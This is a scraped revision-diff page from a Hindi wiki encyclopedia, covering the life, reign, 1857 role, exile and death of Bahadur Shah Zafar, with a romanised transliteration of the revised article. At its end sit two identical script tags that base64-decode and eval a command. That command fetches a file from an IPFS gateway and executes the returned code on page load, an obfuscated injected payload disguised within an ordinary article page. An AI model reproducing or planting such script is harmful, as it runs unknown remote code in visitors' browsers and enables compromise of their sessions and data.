Difference between revisions of "बहादुर शाह ज़फ़र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 2: Line 2:
 
बहादुर शाह ज़फ़र का जन्म [[24 अक्तूबर]] सन् 1775 ई. को [[दिल्ली]] में हुआ था। बहादुर शाह ज़फ़र [[मुग़ल साम्राज्य]] के अंतिम बादशाह थे। इनका शासनकाल 1837-58 तक था। बहादुर शाह ज़फ़र एक कवि, संगीतकार व खुशनवीस थे और राजनीतिक नेता के बजाय सौंदर्यानुरागी व्यक्ति अधिक थे।
 
बहादुर शाह ज़फ़र का जन्म [[24 अक्तूबर]] सन् 1775 ई. को [[दिल्ली]] में हुआ था। बहादुर शाह ज़फ़र [[मुग़ल साम्राज्य]] के अंतिम बादशाह थे। इनका शासनकाल 1837-58 तक था। बहादुर शाह ज़फ़र एक कवि, संगीतकार व खुशनवीस थे और राजनीतिक नेता के बजाय सौंदर्यानुरागी व्यक्ति अधिक थे।
 
==शासनकाल==
 
==शासनकाल==
बहादुर शाह [[अकबर शाह द्वितीय]] और [[लालबाई]] के दूसरे पुत्र थे। अपने शासनकाल के अधिकांश समय उनके पास वास्तविक सत्ता नहीं रही और वह [[अंग्रेज़|अंग्रेज़ों]] पर आश्रित रहे। 1857-58 के भारतीय विद्रोह में वह कुछ समय के लिए और अनिच्छा से शामिल हुए। विद्रोह के दौरान [[मेरठ]] शहर से आई विद्रोही टुकड़ियों ने [[दिल्ली]] पर क़ब्ज़ा कर लिया और बहादुर शाह को विद्रोह का नाममात्र का नेतृत्व स्वीकारने पर मजबूर किया। 82 वर्ष की उम्र में प्राणों के भय से वह मान गए। अंग्रज़ों द्वारा विद्रोह दबाए जाने पर उन्हें सपरिवार [[बर्मा]] निर्वासित कर दिया गया।
+
बहादुर शाह [[अकबर शाह द्वितीय]] और [[लालबाई]] के दूसरे पुत्र थे। अपने शासनकाल के अधिकांश समय उनके पास वास्तविक सत्ता नहीं रही और वह [[अंग्रेज़|अंग्रेज़ों]] पर आश्रित रहे। [[1857]] ई. में [[सिपाही क्रांति 1857|स्वतंत्रता संग्राम]] शुरू होने के समय बहादुर शाह 82 वर्ष के बूढे थे, और स्वयं निर्णय लेने की क्षमता को खो चुके थे। विद्रोहियों ने उनको आज़ाद हिन्दुस्तान का बादशाह बनाया। इस कारण [[अंग्रेज़]] उससे कुपित हो गये और उन्होंने उनसे शत्रुवत् व्यवहार किया। सितम्बर 1857 ई. में अंग्रेज़ों ने दुबारा [[दिल्ली]] पर क़ब्ज़ा जमा लिया और बहादुर शाह द्वितीय को गिरफ़्तार करके उस पर मुक़दमा चलाया गया तथा उसे रंगून निर्वासित कर दिया गया।
 
==मृत्यु==
 
==मृत्यु==
बहादुर शाह ज़फ़र की मृत्यु [[7 नवंबर]] [[1862]] को रंगून (वर्तमान यांगून),बर्मा (वर्तमान [[म्यांमार]]) में हुई थीं।
+
बहादुर शाह ज़फ़र की मृत्यु 86 वर्ष की अवस्था में [[7 नवंबर]] [[1862]] को [[रंगून]] (वर्तमान यांगून), [[बर्मा]] (वर्तमान म्यांमार) में हुई थी। उसी दिन उसके दो बेटों और पोते को भी गिरफ़्तार करके गोली मार दी गई। इस प्रकार बादशाह अकबर के वंश का अन्त हो गया।
  
 
{{प्रचार}}
 
{{प्रचार}}
Line 22: Line 22:
 
[[Category:मध्य काल]]
 
[[Category:मध्य काल]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 12:26, 17 May 2011

thumb|bahadur shah zafar bahadur shah zafar ka janm 24 aktoobar sanh 1775 ee. ko dilli mean hua tha. bahadur shah zafar mugal samrajy ke aantim badashah the. inaka shasanakal 1837-58 tak tha. bahadur shah zafar ek kavi, sangitakar v khushanavis the aur rajanitik neta ke bajay sauandaryanuragi vyakti adhik the.

shasanakal

bahadur shah akabar shah dvitiy aur lalabaee ke doosare putr the. apane shasanakal ke adhikaansh samay unake pas vastavik satta nahian rahi aur vah aangrezoan par ashrit rahe. 1857 ee. mean svatantrata sangram shuroo hone ke samay bahadur shah 82 varsh ke boodhe the, aur svayan nirnay lene ki kshamata ko kho chuke the. vidrohiyoan ne unako azad hindustan ka badashah banaya. is karan aangrez usase kupit ho gaye aur unhoanne unase shatruvath vyavahar kiya. sitambar 1857 ee. mean aangrezoan ne dubara dilli par qabza jama liya aur bahadur shah dvitiy ko giraftar karake us par muqadama chalaya gaya tatha use rangoon nirvasit kar diya gaya.

mrityu

bahadur shah zafar ki mrityu 86 varsh ki avastha mean 7 navanbar 1862 ko rangoon (vartaman yaangoon), barma (vartaman myaanmar) mean huee thi. usi din usake do betoan aur pote ko bhi giraftar karake goli mar di gee. is prakar badashah akabar ke vansh ka ant ho gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>